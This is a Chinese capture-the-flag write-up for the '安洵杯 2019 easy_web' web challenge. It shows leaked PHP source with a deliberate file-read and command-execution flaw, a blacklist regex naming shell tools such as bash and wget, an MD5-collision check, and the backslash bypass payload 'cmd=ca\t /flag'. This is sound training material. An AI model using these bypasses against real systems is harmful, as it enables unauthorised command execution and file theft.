[安洵杯 2019]easy_web
开启环境之后是这样的
url是这样的:http://xxx/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
看到cmd可以猜测是命令执行漏洞,简单测试了两个命令发现在黑名单内
将注意力转移到img上,进行解密
加密方式是:hex->base64->base64
我们解密 base64->base64->hex,解码后为555.png
猜测有文件包含漏洞,用同样的加密方式尝试包含index.php,查看过滤的黑名单
将index.php编码为TmprMlpUWTBOalUzT0RKbE56QTJPRGN3放入img参数中,获得了index.php的base64编码后的结果,为:
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
可以看到在此处过滤了img解码后包含大小写flag的情况,防止我们直接使用文件包含获取flag
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
}
这里是我们第一个要突破的地方,可以看到是对输入的cmd进行了过滤,我们需要一个能够读取文件的命令
接着是这里
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
md5碰撞,让a,b两个值不相等而md5值相等,因为$cmd使用了` `反引号包裹,所以最后是返回cmd的执行结果。
也就是说我们需要突破命令的黑名单过滤和md5碰撞
关于md5碰撞可以参考这篇文章,自制值相同而md5不相同的数据:https://xz.aliyun.com/t/2232
这里我得到的是:
将测试语句加上
if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
die("success!");
}
可以看到返回值中有success!,证明我们碰撞成功了,这也会是我们做这道题所会用到的两个值。
然后是命令过滤突破,观察黑名单列表
先使用cmd=dir%20/查看根目录下的文件
可以看到flag,接下来就是fuzz linux下能够读取文件的命令
这里的:
使用了两个反斜杠和四个反斜杠来过滤,但正则表达式中需要三个反斜杠才可以匹配到一个真正的反斜杠,所以实际上反斜杠没有被过滤。而在linux命令中可以添加反斜杠来绕过黑名单过滤。
所以有
cmd=ca\t%20/flag
也可以使用linux下的sort命令来进行文件读取
Linux sort命令用于将文本文件内容加以排序。sort可针对文本文件的内容,以行为单位来排序。
其作用为:
当然也可以用来读取flag文件。
以上
参考链接:
https://blog.csdn.net/qq_19980431/article/details/83018232
https://xz.aliyun.com/t/2232
https://nikoeurus.github.io/2019/11/30/2019%E5%AE%89%E8%AF%A2%E6%9D%AF-Web/#easy-web
https://www.cnblogs.com/wangtanzhi/p/12244096.html
https://xz.aliyun.com/t/6911
本文暂时没有评论,来添加一个吧(●'◡'●)